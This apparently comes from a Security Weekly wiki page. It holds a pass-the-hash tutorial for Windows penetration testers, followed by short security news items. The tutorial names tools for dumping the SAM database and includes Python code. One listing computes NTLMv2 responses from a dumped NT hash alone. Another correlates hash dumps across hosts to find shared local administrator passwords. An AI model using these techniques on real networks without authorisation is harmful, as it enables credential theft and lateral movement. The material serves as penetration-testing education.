From Security Weekly Wiki

Tech Segment: Pass The Hash, Hold The Salt

We've mentioned it on the show before, referenced it several times in various publications, and SANS covers it in many courses (SEC560 has almost an entire day on password cracking), but here's a little tutorial on how to put it all together. What am I talking about? Windows hashes, either LANMAN or NTLM. They are literally the keys to the kingdom: Windows stores them unsalted, and because NTLM authentication uses the hash itself as the secret, whoever holds the hash can authenticate as that account without ever cracking it. First, you need to collect them by:

  • Sniffing them off of the network (what you capture is a challenge/response pair, which you then crack)
  • Gaining SYSTEM level access to a system and grabbing the SAM database
  • Gaining user level privileges to a system and grabbing a backup copy of the SAM
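To see why the hash alone is enough, here is an added example (not code from the page, Core IMPACT, Metasploit or fgdump) that walks one NTLMv2 challenge/response using only an NT hash as it would appear in a hash dump. It follows the NTOWFv2 and NtChallengeResponse definitions from MS-NLMP; the hash value, user, domain and server name are constructed for illustration.

```python
"""Why a dumped NT hash is enough to authenticate: the NTLMv2 response is
keyed with the hash itself, so the cleartext password never enters the
computation. Added example following MS-NLMP (NTOWFv2, NtChallengeResponse);
it is not code from any tool named on the page."""
import hashlib
import hmac
import os
import struct
import time

# Constructed sample: an NT hash as it appears in a pwdump/fgdump line
# (user:rid:lmhash:nthash:::). The value is made up for illustration.
SAMPLE_NT_HASH = bytes.fromhex("a1b2c3d4e5f60718293a4b5c6d7e8f90")


def av_pair(av_id: int, value: bytes) -> bytes:
    """One AV_PAIR (id, length, value) for the TargetInfo block."""
    return struct.pack("<HH", av_id, len(value)) + value


def target_info(nb_domain: str, nb_server: str) -> bytes:
    """Minimal TargetInfo: NetBIOS domain (0x0002), NetBIOS server (0x0001), EOL."""
    return (av_pair(0x0002, nb_domain.encode("utf-16-le"))
            + av_pair(0x0001, nb_server.encode("utf-16-le"))
            + av_pair(0x0000, b""))


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(key = NT hash, UTF-16LE(UPPER(user) + domain)).
    The key is the hash pulled from the SAM; the password is never needed."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def filetime_now() -> int:
    """Windows FILETIME: 100ns ticks since 1601-01-01."""
    return int((time.time() + 11644473600) * 10_000_000)


def ntlmv2_temp(client_challenge: bytes, timestamp: int, tinfo: bytes) -> bytes:
    """The 'temp' blob: RespType, HiRespType, 6 reserved bytes, FILETIME,
    8-byte client challenge, 4 reserved, TargetInfo, 4 reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + tinfo + b"\x00" * 4)


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, tinfo):
    """Return (NtChallengeResponse, SessionBaseKey) computed from the hash alone."""
    key = ntowf_v2(nt_hash, user, domain)
    temp = ntlmv2_temp(client_challenge, timestamp, tinfo)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


def verify_ntlmv2(stored_nt_hash, user, domain, server_challenge, nt_challenge_response):
    """What the authenticating side does: recompute NtProofStr from its own
    stored copy of the hash and compare in constant time."""
    nt_proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(expected, nt_proof)


def run_exchange(nt_hash=SAMPLE_NT_HASH, user="tom", domain="CORP"):
    """Simulate one exchange with nothing but the dumped hash.
    Returns (accepted, accepted_with_wrong_hash)."""
    server_challenge = os.urandom(8)   # CHALLENGE_MESSAGE from the target
    client_challenge = os.urandom(8)   # chosen by the (attacking) client
    tinfo = target_info(domain, "FILESRV01")  # constructed server name
    resp, _ = ntlmv2_response(nt_hash, user, domain, server_challenge,
                              client_challenge, filetime_now(), tinfo)
    accepted = verify_ntlmv2(nt_hash, user, domain, server_challenge, resp)
    wrong = bytes(b ^ 0xFF for b in nt_hash)
    accepted_wrong = verify_ntlmv2(wrong, user, domain, server_challenge, resp)
    return accepted, accepted_wrong


if __name__ == "__main__":
    print("accepted with dumped hash, accepted with wrong hash:", run_exchange())
```

Note that nothing in the exchange ever converts a password to a hash; the only secret material on either side is the 16-byte NT hash, which is exactly what hashdump or fgdump hands you. The function outputs can be checked against the NTLMv2 examples in the MS-NLMP specification if you want to confirm the construction.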

I won't go into a lot of detail about the above, because, well, we've been there before. So let's say, for example, you compromise a system on the internal (or external) network. The first thing you should do (after your happy dance of pwnage) is to grab the SAM database. You can do that with:

  • Metasploit - Meterpreter.dll "hashdump" command
  • Core IMPACT - "Dump Passwords From SAM"
  • fgdump - Excellent tool for dumping passwords (I upload it to NT 4.0 systems because Core doesn't support them for password dumping)

So, you go along and try to crack those hashes with john, which can have sexy results most of the time. However, remember you can also pass the hash! But first, you must choose which hashes to pass. I try to determine whether there is a shared local administrator password amongst systems. If I've compromised a bunch of systems I will review the hashes and look for similarities. Remember, there is no salt, so identical hashes mean identical passwords: if the hash of "administrator" on some systems shows up under the username "tom" on others, one can deduce that an admin may have gotten sneaky and renamed the local administrator account (the RID gives it away too; the built-in administrator is always RID 500, whatever it is called). So grep, sort, and uniq are your friends; do some analysis of the hashes. To pass the hash, I've had great success using Core IMPACT's module "Install Agent Using SMB".
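The hash analysis described above, as an added example that is not the author's own grep/sort/uniq pipeline: it parses pwdump-format lines (the format hashdump and fgdump emit) from several hosts, reports NT hashes that repeat across machines, flags a renamed built-in Administrator by its RID, and lists accounts that still store a LANMAN hash. The host names, account names and every hash value below are constructed.

```python
"""Correlate pwdump-format hash dumps from several hosts: NT hashes that repeat
across machines (no salt, so same hash = same password), a renamed built-in
Administrator spotted by RID 500, and accounts still storing a LANMAN hash.
Added example; not the author's commands. Dumps and hash values are made up."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed hash values (not real accounts).
H_LOCAL_ADMIN = "0a1b2c3d4e5f60718293a4b5c6d7e8f9"
H_SRV_ADMIN = "f9e8d7c6b5a493827160f5e4d3c2b1a0"
H_SVC = "11223344556677889900aabbccddeeff"
H_ALICE = "00112233445566778899aabbccddeeff"
H_DECOY = "deadbeefdeadbeefdeadbeefdeadbeef"
H_SVC_LM = "0123456789abcdefaad3b435b51404ee"   # second half empty: password is 7 chars or less

# host -> lines as hashdump/fgdump print them: user:rid:lmhash:nthash:::
DUMPS = {
    "ws01": [
        f"Administrator:500:{EMPTY_LM}:{H_LOCAL_ADMIN}:::",
        f"alice:1001:{EMPTY_LM}:{H_ALICE}:::",
        "Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::",
    ],
    "ws02": [
        "# fgdump output, ws02",                        # comment lines must be skipped
        f"tom:500:{EMPTY_LM}:{H_LOCAL_ADMIN}:::",       # RID 500 renamed; same hash as ws01
        f"Administrator:1005:{EMPTY_LM}:{H_DECOY}:::",  # decoy account carrying the old name
    ],
    "srv01": [
        f"Administrator:500:{EMPTY_LM}:{H_SRV_ADMIN}:::",
        f"svc_backup:1002:{H_SVC_LM}:{H_SVC}:::",
    ],
    "srv02": [
        f"svc_backup:1002:{EMPTY_LM}:{H_SVC}:::",
    ],
}


def parse_pwdump(line):
    """Return (user, rid, lm, nt) or None for blank, comment or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or not HEX32.match(nt):
        return None          # e.g. Guest with "NO PASSWORD***" placeholders
    return user, int(rid), lm, nt


def load(dumps):
    """Flatten host -> lines into (host, user, rid, lm, nt) rows."""
    rows = []
    for host, lines in dumps.items():
        for line in lines:
            rec = parse_pwdump(line)
            if rec:
                rows.append((host,) + rec)
    return rows


def shared_nt_hashes(dumps):
    """NT hashes present on more than one host: nt -> sorted [(host, user, rid)].
    Without a salt, equal hashes mean equal passwords, so these are PtH targets."""
    by_hash = defaultdict(set)
    for host, user, rid, _lm, nt in load(dumps):
        by_hash[nt].add((host, user, rid))
    return {nt: sorted(v) for nt, v in by_hash.items()
            if len({h for h, _, _ in v}) > 1}


def renamed_admins(dumps):
    """RID 500 is the built-in Administrator no matter what it has been renamed to."""
    return sorted((host, user) for host, user, rid, _lm, _nt in load(dumps)
                  if rid == 500 and user.lower() != "administrator")


def lm_hashes_present(dumps):
    """Accounts that still store a LANMAN hash (cheap to crack). The flag is True
    when the second 7-char half is empty, i.e. the password is at most 7 chars."""
    return sorted((host, user, lm[16:] == EMPTY_LM[16:])
                  for host, user, _rid, lm, _nt in load(dumps)
                  if HEX32.match(lm) and lm != EMPTY_LM)


def report(dumps):
    """Human-readable summary lines for the findings above."""
    out = [f"shared NT hash {nt}: " + ", ".join(f"{h}\\{u} (rid {r})" for h, u, r in seen)
           for nt, seen in sorted(shared_nt_hashes(dumps).items())]
    out += [f"renamed built-in Administrator: {h}\\{u}" for h, u in renamed_admins(dumps)]
    out += [f"LM hash stored: {h}\\{u}" + (" (password <= 7 chars)" if short else "")
            for h, u, short in lm_hashes_present(dumps)]
    return out


if __name__ == "__main__":
    print("\n".join(report(DUMPS)))
```

Run against real dumps, feed it one list of lines per host; the interesting output is the shared-hash section, since one hash reused as local Administrator across many workstations is the classic case where a single pass-the-hash gets you all of them.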


Stories For Discussion

Stephen Northcutt's Security Predictions Page - [PaulDotCom] - Experts from the field weigh in on security predictions. You know, I've changed my mind about predictions. I've decided that they are fun to make because you can think big and outlandish, and hey, it's just a prediction. I make some more serious predictions, as do Josh Wright, Eric Cole, Rob Lee, and several others.

Tcpdump and Libpcap Updates - [PaulDotCom] - I have to tell you, while Wireshark is all sexy, GUI, and pretty, I MUCH prefer tcpdump. There is something just so familiar and comfortable to me about the command line (in fact, I have actually been enjoying Windows by using more of the command line). I also found it interesting when the release notes mention "Add support for Bluetooth Sniffing", really?

Metadata, PDF files, and watching attackers - [PaulDotCom] - I don't recommend actually watching hackers. For one, most are not supermodels (nor are many of them actually female); second, it's pretty boring to watch someone type, even if they are doing cool, sexy hacking things. But here is a way to look into how an attacker created a malicious PDF, how long it took, what version he used to create it, etc. I like this idea, using metadata techniques against the attackers!

SOHO Router Wireless Security Report - [PaulDotCom] - This paper details some attacks against SOHO routers. First, they go over the DHCP hostname XSS vulnerability, which can execute XSS against an administrator. Another attack, which I thought was neat, was that they registered their hostname with DHCP as "www.google.com", and got the router to update its DNS cache accordingly so that www.google.com resolved to a local IP address. So, if you have a Linksys WRT160N, D-Link DIR-615, Belkin F5D8233-4v3, or ActionTec MI424-WR, you want to read this paper :)

Caller-ID Spoofing = Voicemail access - [PaulDotCom] - Voicemail can contain sensitive information (never leave passwords on someone's voicemail). Also, the information gathering potential is huge. Set a PIN!

I <3 Protocol Attacks - [PaulDotCom] - The main reason I love design flaws is that they stick around a lot longer than software vulnerabilities. Simply because they are harder to fix :) SMBrelay was great, and let me tell ya, you can have a FIELD DAY with it :)